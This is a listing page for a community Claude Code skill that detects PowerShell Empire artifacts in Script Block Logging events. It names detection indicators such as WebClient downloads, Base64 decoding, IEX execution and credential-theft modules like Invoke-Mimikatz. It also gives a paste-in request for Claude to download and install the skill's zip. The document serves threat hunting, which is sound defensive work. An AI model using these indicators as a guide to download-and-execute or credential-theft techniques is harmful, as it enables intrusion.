analyzing-powershell-empire-artifacts
CommunityDetect Empire artifacts in PowerShell logs
Data & Analytics#powershell#threat-hunting#empire#script-block-logging#module-logging#base64-decoding#ioc-detection
AuthorAxxxxxxaaann
Version1.0.0
Installs0
System Documentation
What problem does it solve?
PowerShell Empire artifacts can hide in Windows event logs, making it difficult for security teams to quickly identify compromised systems. This Skill provides a structured approach to detect Empire launcher patterns, stager IOCs, module signatures, staging URIs, and default user agents in Script Block Logging events, enabling faster containment and response.
Core Features & Use Cases
- Detects the default Empire launcher pattern in PowerShell Script Block Logging (Event ID 4104) and decodes embedded Base64 payloads for analysis.
- Identifies Empire stager indicators such as System.Net.WebClient usage, FromBase64String decoding, and common IEX/Invoke-Expression execution patterns.
- Flags Empire module signatures (e.g., Invoke-Mimikatz, Invoke-Kerberoast) along with default staging URIs and user agents to support threat-hunting workflows.
- Produces a structured report mapping detections to MITRE ATT&CK techniques and facilitating incident response.
Quick Start
Run the agent script to scan Windows PowerShell event logs for Empire artifacts and generate findings.
Dependency Matrix
Required Modules
None requiredComponents
scriptsreferences
💻 Claude Code Installation
Recommended: Let Claude install automatically. Simply copy and paste the text below to Claude Code.
Please help me install this Skill: Name: analyzing-powershell-empire-artifacts Download link: https://github.com/Axxxxxxaaann/KAIRI-Skills/archive/main.zip#analyzing-powershell-empire-artifacts Please download this .zip file, extract it, and install it in the .claude/skills/ directory.
Agent Skills Search Helper
Install a tiny helper to your Agent, search and equip skill from 471,000+ vetted skills library on demand.